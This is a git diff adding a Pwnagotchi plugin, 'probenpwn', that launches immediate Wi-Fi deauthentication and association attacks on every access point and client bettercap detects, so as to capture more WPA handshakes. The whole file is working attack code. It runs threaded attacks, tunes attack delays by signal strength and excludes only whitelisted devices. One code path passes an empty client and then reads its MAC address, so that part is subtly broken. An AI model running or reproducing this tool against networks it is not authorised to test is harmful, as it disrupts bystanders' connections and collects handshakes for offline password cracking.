diff --git a/probenpwn.py b/probenpwn.py new file mode 100644 index 0000000..17bdb99 --- /dev/null +++ b/probenpwn.py @@ -0,0 +1,139 @@ +import logging +import time +import threading +import pwnagotchi.plugins as plugins + +class probenpwn(plugins.Plugin): + __author__ = 'AlienMajik' + __version__ = '1.0.0' + __license__ = 'GPL3' + __description__ = 'Pwn more aggressively. Launch immediate associate or deauth attack when bettercap spots a device, with enhanced performance for more handshakes.' + + def __init__(self): + logging.debug("ProbeNpwn plugin created") + self._agent = None + self.old_name = None + self.recents = {} + self.whitelist = set() + self.attack_threads = [] + self.epoch_duration = 60 # Define a default epoch duration (seconds) + + # called before the plugin is unloaded + def on_unload(self, ui): + if self.old_name: + ui.set('name', "%s " % self.old_name) + else: + ui.set('name', "%s> " % ui.get('name')[:-3]) + self.old_name = None + logging.info("probing out.") + + # called to setup the UI elements + def on_ui_setup(self, ui): + self._ui = ui + + def on_ui_update(self, ui): + if self.old_name is None: + self.old_name = ui.get('name') + if self.old_name: + i = self.old_name.find('>') + if i: + ui.set('name', "%s%s" % (self.old_name[:i], "!!!")) + + # called when everything is ready and the main loop is about to start + def on_ready(self, agent): + self._agent = agent + logging.info("Probed and Pwnd!") + agent.run("wifi.clear") + if self._ui: + self._ui.set("status", "Probing!\nPWNING THEM GUTS!") + + def track_recent(self, ap, cl=None): + ap['_track_time'] = time.time() + self.recents[ap['mac'].lower()] = ap + if cl: + cl['_track_time'] = ap['_track_time'] + self.recents[cl['mac'].lower()] = cl + + def ok_to_attack(self, ap): + if not self._agent: + return False + if ap['hostname'].lower() in self.whitelist or ap['mac'].lower() in self.whitelist: + return False + return True + + def attack_target(self, agent, ap, cl): + if not self.ok_to_attack(ap): + return + logging.debug(f"Launching attack on AP {ap['mac']} and client {cl['mac']}") + # Perform deauth attack + agent.deauth(ap, cl, self.dynamic_attack_delay(ap, cl)) + # Perform associate attack + agent.associate(ap, 0.2) + + def dynamic_attack_delay(self, ap, cl): + # Adjust attack delay based on client signal strength or network type + if cl.get('signal', -100) < -60: + return 0.5 # Longer delay for weak signals + else: + return 0.25 # Faster attack for stronger signals + + def on_bcap_wifi_ap_new(self, agent, event): + try: + ap = event['data'] + if agent._config['personality']['associate'] and self.ok_to_attack(ap): + logging.debug("insta-associate: %s (%s)" % (ap['hostname'], ap['mac'])) + # Start a thread to handle the attack + attack_thread = threading.Thread(target=self.attack_target, args=(agent, ap, None)) + attack_thread.start() + self.attack_threads.append(attack_thread) + except Exception as e: + logging.error(f"Error in on_bcap_wifi_ap_new: {repr(e)}") + + def on_bcap_wifi_client_new(self, agent, event): + try: + ap = event['data']['AP'] + cl = event['data']['Client'] + if agent._config['personality']['deauth'] and self.ok_to_attack(ap) and self.ok_to_attack(cl): + logging.debug("insta-deauth: %s (%s)->'%s'(%s)(%s)" % (ap['hostname'], ap['mac'], + cl['hostname'], cl['mac'], cl['vendor'])) + # Start a thread for each deauth attack + attack_thread = threading.Thread(target=self.attack_target, args=(agent, ap, cl)) + attack_thread.start() + self.attack_threads.append(attack_thread) + except Exception as e: + logging.error(f"Error in on_bcap_wifi_client_new: {repr(e)}") + + def on_handshake(self, agent, filename, ap, cl): + logging.info(f"Handshake detected from {ap['mac']}") + if 'mac' in ap and 'mac' in cl: + amac = ap['mac'].lower() + cmac = cl['mac'].lower() + if amac in self.recents: + logging.info(f"Captured handshake from {ap['hostname']} ({ap['mac']}) -> '{cl['hostname']}' ({cl['mac']}) ({cl['vendor']})") + del self.recents[amac] + if cmac in self.recents: + del self.recents[cmac] + + def on_epoch(self, agent, epoch, epoch_data): + for mac in list(self.recents): + if self.recents[mac]['_track_time'] < (time.time() - (self.epoch_duration * 2)): + del self.recents[mac] + + def on_bcap_wifi_ap_updated(self, agent, event): + try: + ap = event['data'] + if self.ok_to_attack(ap): + logging.debug(f"AP updated: {ap['hostname']} ({ap['mac']})") + self.track_recent(ap) + except Exception as e: + logging.error(f"Error in on_bcap_wifi_ap_updated: {repr(e)}") + + def on_bcap_wifi_client_updated(self, agent, event): + try: + ap = event['data']['AP'] + cl = event['data']['Client'] + if self.ok_to_attack(ap) and self.ok_to_attack(cl): + logging.debug(f"Client updated: {ap['hostname']} ({ap['mac']}) -> '{cl['hostname']}' ({cl['mac']}) ({cl['vendor']})") + self.track_recent(ap, cl) + except Exception as e: + logging.error(f"Error in on_bcap_wifi_client_updated: {repr(e)}")